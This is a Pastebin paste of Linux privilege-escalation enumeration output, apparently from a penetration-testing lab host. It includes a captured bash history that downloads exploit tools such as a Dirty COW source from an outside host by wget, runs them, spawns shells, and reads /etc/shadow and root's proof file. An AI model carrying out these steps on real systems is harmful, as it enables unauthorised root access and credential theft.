  1285. [-] /etc/init.d/ binary permissions:
  1286. total 332
  1287. drwxr-xr-x 2 root root 4096 2015-02-27 19:06 .
  1288. drwxr-xr-x 57 root root 4096 2017-06-13 17:15 ..
  1289. -rwxr-xr-x 1 root root 1850 2006-01-14 06:12 acpid
  1290. -rwxr-xr-x 1 root root 969 2006-01-03 02:15 atd
  1291. -rwxr-xr-x 1 root root 5089 2006-09-20 07:33 bootclean
  1292. -rwxr-xr-x 1 root root 2146 2006-09-12 17:30 bootlogd
  1293. -rwxr-xr-x 1 root root 1915 2006-09-20 07:27 bootmisc.sh
  1294. -rwxr-xr-x 1 root root 2930 2006-09-14 04:20 checkfs.sh
  1295. -rwxr-xr-x 1 root root 9548 2006-09-23 03:34 checkroot.sh
  1296. -rwxr-xr-x 1 root root 6110 2006-09-05 12:15 console-screen.sh
  1297. -rwxr-xr-x 1 root root 1761 2006-10-12 14:55 cron
  1298. -rwxr-xr-x 1 root root 7104 2007-01-18 12:45 exim4
  1299. -rwxr-xr-x 1 root root 5823 2007-07-30 16:39 glibc.sh
  1300. -rwxr-xr-x 1 root root 1360 2007-01-13 13:52 halt
  1301. -rwxr-xr-x 1 root root 1287 2006-09-12 17:31 hostname.sh
  1302. -rwxr-xr-x 1 root root 3886 2007-02-21 12:48 hwclock.sh
  1303. -rwxr-xr-x 1 root root 2518 2006-09-15 14:03 ifupdown
  1304. -rwxr-xr-x 1 root root 1046 2006-09-15 14:03 ifupdown-clean
  1305. -rwxr-xr-x 1 root root 3484 2006-10-15 23:38 keymap.sh
  1306. -rwxr-xr-x 1 root root 944 2006-09-12 17:31 killprocs
  1307. -rwxr-xr-x 1 root root 1375 2006-05-25 05:38 klogd
  1308. -rwxr-xr-x 1 root root 417 2006-08-08 18:38 libdevmapper1.02
  1309. -rwxr-xr-x 1 root root 1054 2006-09-06 17:43 makedev
  1310. -rwxr-xr-x 1 root root 1793 2006-11-14 06:12 module-init-tools
  1311. -rwxr-xr-x 1 root root 617 2006-01-15 06:04 mountall-bootclean.sh
  1312. -rwxr-xr-x 1 root root 1718 2006-09-12 17:30 mountall.sh
  1313. -rwxr-xr-x 1 root root 2206 2006-10-03 14:22 mountdevsubfs.sh
  1314. -rwxr-xr-x 1 root root 2394 2006-09-25 04:36 mountkernfs.sh
  1315. -rwxr-xr-x 1 root root 615 2006-01-15 06:04 mountnfs-bootclean.sh
  1316. -rwxr-xr-x 1 root root 2299 2006-11-26 08:35 mountnfs.sh
  1317. -rwxr-xr-x 1 root root 3668 2006-11-26 10:13 mtab.sh
  1318. -rwxr-xr-x 1 root root 1898 2007-01-16 04:06 nbd-server
  1319. -rwxr-xr-x 1 root root 2550 2007-01-06 10:36 networking
  1320. -rwxr-xr-x 1 root root 6644 2007-05-16 06:41 nfs-common
  1321. -rwxr-xr-x 1 root root 4340 2007-05-16 06:41 nfs-kernel-server
  1322. -rwxr-xr-x 1 root root 1241 2006-10-09 08:29 nfs-user-server
  1323. -rwxr-xr-x 1 root root 2324 2007-02-25 15:29 openbsd-inetd
  1324. -rwxr-xr-x 1 root root 1525 2006-12-22 03:15 portmap
  1325. -rwxr-xr-x 1 root root 997 2006-09-12 21:42 procps.sh
  1326. -rwxr-xr-x 1 root root 8045 2006-11-27 17:23 rc
  1327. -rwxr-xr-x 1 root root 798 2006-09-28 13:25 rc.local
  1328. -rwxr-xr-x 1 root root 480 2012-01-22 07:06 rc.py
  1329. -rwxr-xr-x 1 root root 117 2005-12-02 12:44 rcS
  1330. -rw-r--r-- 1 root root 1386 2006-09-13 02:10 README
  1331. -rwxr-xr-x 1 root root 655 2006-09-22 10:21 reboot
  1332. -rwxr-xr-x 1 root root 994 2006-09-12 17:30 rmnologin
  1333. -rwxr-xr-x 1 root root 2153 2008-05-29 06:10 samba
  1334. -rwxr-xr-x 1 root root 1376 2006-11-27 17:23 sendsigs
  1335. -rwxr-xr-x 1 root root 585 2006-09-12 17:32 single
  1336. -rw-r--r-- 1 root root 4187 2006-09-12 17:32 skeleton
  1337. -rwxr-xr-x 1 root root 1891 2007-03-05 11:38 ssh
  1338. -rwxr-xr-x 1 root root 520 2006-09-12 17:26 stop-bootlogd
  1339. -rwxr-xr-x 1 root root 730 2006-10-02 13:14 stop-bootlogd-single
  1340. -rwxr-xr-x 1 root root 541 2006-04-06 15:58 sudo
  1341. -rwxr-xr-x 1 root root 2037 2006-05-25 05:38 sysklogd
  1342. -rw-r--r-- 1 root root 8178 2006-12-19 05:21 udev
  1343. -rw-r--r-- 1 root root 1252 2006-03-28 02:44 udev-mtab
  1344. -rwxr-xr-x 1 root root 3175 2006-11-25 04:22 umountfs
  1345. -rwxr-xr-x 1 root root 2128 2006-11-26 13:23 umountnfs.sh
  1346. -rwxr-xr-x 1 root root 1122 2006-09-30 10:37 umountroot
  1347. -rwxr-xr-x 1 root root 1815 2006-09-12 17:30 urandom
  1348. -rwxr-xr-x 1 root root 41912 2015-02-27 19:06 vmware-tools
  1349.  
  1350.  
  1351. ### SOFTWARE #############################################
  1352. [-] Sudo version:
  1353. Sudo version 1.6.8p12
  1354.  
  1355.  
  1356. ### INTERESTING FILES ####################################
  1357. [-] Useful file locations:
  1358. /bin/nc
  1359. /bin/netcat
  1360. /usr/bin/wget
  1361. /usr/bin/gcc
  1362.  
  1363.  
  1364. [-] Installed compilers:
  1365. ii gcc 4.1.1-15 The GNU C compiler
  1366. ii gcc-4.1 4.1.1-21 The GNU C compiler
  1367.  
  1368.  
  1369. [-] Can we read/write sensitive files:
  1370. -rw-r--r-- 1 root root 945 2008-10-07 16:34 /etc/passwd
  1371. -rw-r--r-- 1 root root 503 2008-10-05 19:21 /etc/group
  1372. -rw-r--r-- 1 root root 475 2006-10-28 09:42 /etc/profile
  1373. -rw-r----- 1 root shadow 680 2016-06-09 07:29 /etc/shadow
  1374.  
  1375.  
  1376. [-] NFS config details:
  1377. -rw-r--r-- 1 root root 1 2008-10-11 14:30 /etc/exports
  1378.  
  1379.  
  1380. [-] Can't search *.conf files as no keyword was entered
  1381.  
  1382. [-] Can't search *.php files as no keyword was entered
  1383.  
  1384. [-] Can't search *.log files as no keyword was entered
  1385.  
  1386. [-] Can't search *.ini files as no keyword was entered
  1387.  
  1388. [-] All *.conf files in /etc (recursive 1 level):
  1389. -rw-r--r-- 1 root root 1183 2008-10-07 16:41 /etc/inetd.conf
  1390. -rw-r--r-- 1 root root 624 2006-07-07 22:43 /etc/mtools.conf
  1391. -rw-r--r-- 1 root root 240 2007-09-05 20:01 /etc/kernel-img.conf
  1392. -rw-r--r-- 1 root root 899 2006-10-29 10:27 /etc/gssapi_mech.conf
  1393. -rw-r--r-- 1 root root 599 2005-09-03 08:49 /etc/logrotate.conf
  1394. -rw-r--r-- 1 root root 2555 2004-12-06 08:59 /etc/reportbug.conf
  1395. -rw-r--r-- 1 root root 1260 2007-02-25 14:30 /etc/ucf.conf
  1396. -rw-r--r-- 1 root root 149 2007-09-05 20:29 /etc/modules.conf
  1397. -rw-r--r-- 1 root root 9 2006-08-07 13:14 /etc/host.conf
  1398. -rw-r--r-- 1 root root 330 2007-03-06 21:17 /etc/mke2fs.conf
  1399. -rw-r--r-- 1 root root 475 2006-08-28 12:33 /etc/nsswitch.conf
  1400. -rw-r--r-- 1 root root 145 2007-09-05 20:00 /etc/idmapd.conf
  1401. -rw-r--r-- 1 root root 552 2004-07-31 16:34 /etc/pam.conf
  1402. -rw-r--r-- 1 root root 2673 2006-12-20 14:31 /etc/debconf.conf
  1403. -rw-r--r-- 1 root root 600 2007-01-19 02:25 /etc/deluser.conf
  1404. -rw-r--r-- 1 root root 33 2007-09-05 19:45 /etc/ld.so.conf
  1405. -rw-r--r-- 1 root root 2803 2007-09-05 19:48 /etc/adduser.conf
  1406. -rw-r--r-- 1 root root 777 2006-09-12 21:53 /etc/sysctl.conf
  1407. -rw-r--r-- 1 root root 1749 2006-06-21 02:43 /etc/identd.conf
  1408. -rw-r--r-- 1 root root 216 2007-03-07 17:56 /etc/sestatus.conf
  1409. -rw-r--r-- 1 root root 1664 2006-05-25 05:38 /etc/syslog.conf
  1410. -rw-r--r-- 1 root root 807 2011-09-29 22:24 /etc/updatedb.conf
  1411. -rw-r--r-- 1 root root 46 2016-04-19 03:53 /etc/resolv.conf
  1412.  
  1413.  
  1414. [-] Current user's history files:
  1415. -rw------- 1 bob bob 4367 2018-08-07 21:36 /home/bob/.bash_history
  1416.  
  1417.  
  1418. [+] Root's history files are accessible!
  1419. -rw------- 1 root root 35 2016-06-09 07:30 /root/.bash_history
  1420.  
  1421.  
  1422. [-] Location and contents (if accessible) of .bash_history file(s):
  1423. /home/bob/.bash_history
  1424.  
  1425. exit
  1426. exit
  1427. exit
  1428. ls
  1429. cd ..
  1430. ls
  1431. cd ..
  1432. ls
  1433. cd usr
  1434. ls
  1435. cd bin
  1436. ls
  1437. ls
  1438. cd ..
  1439. ls
  1440. cd ..
  1441. ls
  1442. cd var
  1443. ls
  1444. cd bak
  1445. cd backups/
  1446. ls
  1447. cd ..
  1448. ls
  1449. cd /
  1450. find . -exec file {} \; | grep -i elf
  1451. /bin/sh -i
  1452. ls
  1453. id
  1454. /bin/bash
  1455. ls -l
  1456. strings
  1457. strings vmlinuz
  1458. ls
  1459. cd sbin
  1460. ls
  1461. ls -l
  1462. cd ..
  1463. ls
  1464. cd home
  1465. cd bob
  1466. ls
  1467. cd files
  1468. ls
  1469. cat *
  1470. cd ..
  1471. cd ..
  1472. cd ..
  1473. cd tmp
  1474. ls
  1475. wget http://10.11.1.86:8000/linuxprivchecker.py
  1476. wget http://10.11.1.86:8000/linuxprivchecker.py
  1477. wget http://10.11.0.86:8000/linuxprivchecker.py
  1478. python linuxprivchecker.py
  1479. /bin/su
  1480. /usr/bin
  1481. ls
  1482. cd /usr/bin
  1483. ls
  1484. strings at
  1485. strings at
  1486. strings at
  1487. wget http://10.11.0.86:8000/dcow.c
  1488. cd /tmp
  1489. wget http://10.11.0.86:8000/dcow.c
  1490. chmod +x dcow.c
  1491. ./dcow.c
  1492. id
  1493. euid
  1494. ps
  1495. ps -eo pid,user,uid,args
  1496. ps -eo pid,euid | grep YOUR_PID_HERE
  1497. ps
  1498. ps -eo pid,euid | grep 3623
  1499. ps -eo pid,euid | grep 3620
  1500. seteuid(0)
  1501. ps -eo pid,euid | grep 3620
  1502. ./dcow.c
  1503. ./dcow.c
  1504. ./dcow.c
  1505. ./dcow.c
  1506. $PATH
  1507. echo $PATH
  1508. echo $SHELL
  1509. find / -perm -u=s -type f 2>/dev/null
  1510. $PATH=/bin/su
  1511. set $PATH = /bin/su
  1512. echo $PATH
  1513. export PATH="$PATH:/bin/su"
  1514. echo $PATH
  1515. whoami
  1516. id
  1517. ps
  1518. /bin/bash
  1519. ls
  1520. id
  1521. echo $PATH
  1522. ps
  1523. ps -eo pid,euid,ruid,suid | grep 375
  1524. ps -eo pid,euid,ruid,suid | grep 677
  1525. ps -eo pid,euid,ruid,suid | grep 3623
  1526. ps -eo pid,euid,ruid,suid | grep 372
  1527. sudo su
  1528. /bin/su
  1529. /bin.su
  1530. /bin/h
  1531. /bin/sh
  1532. ls
  1533. id
  1534. whoami
  1535. ps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREps -eo pid,euid,ruid,suid | grep YOUR_PID_HEREls
  1536. ls
  1537. ls -l
  1538. cd vmware-root/
  1539. ls
  1540. strings vmware-root/
  1541. /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
  1542. cd /usr/lib/vmware-tools/bin32/
  1543. ls
  1544. ls -l
  1545. strings vmware-user-suid-wrapper
  1546. chmod +x vmware-user-suid-wrapper
  1547. ./vmware-user-suid-wrapper
  1548. id
  1549. whoami
  1550. uid
  1551. id
  1552. sudo -l
  1553. sudo -s
  1554. ls
  1555. cd files
  1556. ls
  1557. cd ~
  1558. ls
  1559. cd ..
  1560. cd ..
  1561. ls
  1562. cd home
  1563. ls
  1564. cd .ssh
  1565. cd bob
  1566. cd .ssj
  1567. cd .ssh
  1568. ls
  1569. cat authorized_keys
  1570. cd ..
  1571. cd ..
  1572. ls
  1573. cd ..
  1574. ls
  1575. cat /etc/passwd
  1576. cat /etc/shadow
  1577. cd root
  1578. ls
  1579. cat proof.txt
  1580. uname -a
  1581. setuid id
  1582. setuid
  1583. setid
  1584. access
  1585. setfsuid
  1586. ps -f -u user1
  1587. ps -f -u bob
  1588. ps -eo pid,euid,ruid,suid | grep 2174
  1589. ps -eo pid,euid,ruid,suid | grep 2175
  1590. ps -eo pid,euid,ruid,suid | grep 2203
  1591. setuid(0)
  1592. setuid() ;
  1593. setuid(0)
  1594. setuid('0')
  1595. setuid(1001)
  1596. setuid
  1597. setuid() 1001
  1598. setuid() -h
  1599. man setuid
  1600. seteuid(0)
  1601. seteuid(1001)
  1602. seteuid() ;
  1603. seteuid(getuid())
  1604. seteuid(getuid(1001))
  1605. getenv("SUDO_UID")
  1606. seteuid(0) /bin/bash
  1607. /bin/bash
  1608. $shell
  1609. $ENV
  1610. python
  1611. pyton -c 'import pty;pty.spawn("/bin/bash")'
  1612. python -c 'import pty;pty.spawn("/bin/bash")'
  1613. cd /tmp
  1614. ls
  1615. wget http://10.11.0.86/linenu.sh
  1616. wget http://10.11.0.86:8000/linenu.sh
  1617. wget http://10.11.0.86:8000/linenum.sh
  1618. wget http://10.11.0.86:8000/linuxprivchecker.py
  1619. ls
  1620. bash linenum.sh
  1621. python linuxprivchecker.py
  1622. wget http://10.11.0.86:8000/a.out
  1623. ./a.out
  1624. chmod +x a.out
  1625. ./a.out
  1626. id
  1627. ps
  1628. ps -aux
  1629. ps -eo pid,euid,ruid,suid | grep 2272
  1630. ps -eo pid,euid,ruid,suid | grep 2175
  1631. nano a.py
  1632. python a.py
  1633. nano a.py
  1634. python a.py
  1635. nano a.py
  1636. python a.py
  1637. ps -eo pid,euid,ruid,suid | grep 2175
  1638. sudo
  1639. sudo -h
  1640. sudo --help
  1641. sudo -l
  1642. nano a.py
  1643. python a.py
  1644. nano a.py
  1645. python a.py
  1646. ps -eo pid,euid,ruid,suid | grep 2175
  1647. ps
  1648. ps -eo pid,euid,ruid,suid | grep 2760
  1649. ps -eo pid,euid,ruid,suid | grep 2893
  1650. ps
  1651. /bin/bash
  1652. /bin/sh
  1653. ls
  1654. python a.py
  1655. ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
  1656. lsps -efl | grep 'sleep 1' | grep -v gre
  1657. ps -efl | grep 'sleep 1' | grep -v gre
  1658. ps -efl | grep 'sleep 1' | grep -v grep
  1659. ps -efl | grep 'sleep 1' | grep -v grep
  1660. ps -efl | grep 'sleep 1' | grep -v grep
  1661. ps -efl | grep 'sleep 1' | grep -v grep
  1662. ps -efl | grep 'sleep 1' | grep -v grep
  1663. ps -efl | grep 'sleep 1' | grep -v grep
  1664. ps -efl | grep 'sleep 1' | grep -v grep
  1665. ps -efl | grep 'sleep 1' | grep -v grep
  1666. ps -efl | grep 'sleep 1' | grep -v
  1667. ps -efl | grep 'sleep 1'
  1668. ps -efl | grep 'sleep 1'
  1669. python a.p
  1670. python a.py
  1671. ls /proc
  1672. cd 2893
  1673. ls
  1674. ls /proc/2893
  1675. ls /proc/2893/fd
  1676. ls /proc/2893/fd/1
  1677. ls /proc/2893/fd/1
  1678. cat /proc/2893/fd/1
  1679. echo n> /proc/2893/fd/1
  1680. echo n >/proc/2893/fd/1
  1681. cat /proc/2893/fd/1
  1682. echo n >/proc/2893/fd/1
  1683. loc
  1684. ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID; }
  1685. ps -efl | grep 'sleep 1' | grep -v grep | { read PID REST ; echo $PID;
  1686. ps -efl | grep 'sleep 1' | grep -v grep
  1687. ps -efl | grep 'sleep 1' | grep -v grep|cut -d " " -f 4
  1688. ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $3'}
  1689. ps -efl | grep 'sleep 1' | grep -v grep|awk {'print $4'}
  1690. python a.py
  1691. python a.py
  1692. nano a.py
  1693. python a.py
  1694. nano a.py
  1695. python a.py
  1696. nano a.py
  1697. python a.py
  1698. nano a.py
  1699. python a.py
  1700. nano a.py
  1701. whoami
  1702. id
  1703. ps aux
  1704. /bin/sh
  1705. ls
  1706. whoami
  1707. id
  1708. /bin/bash
  1709.  
  1710.  
  1711. [-] Any interesting mail in /var/mail:
  1712. total 8
  1713. drwxrwsr-x 2 root mail 4096 2007-09-05 19:45 .
  1714. drwxr-xr-x 13 root root 4096 2007-09-05 19:45 ..
  1715.  
  1716.  
  1717. ### SCAN COMPLETE ####################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!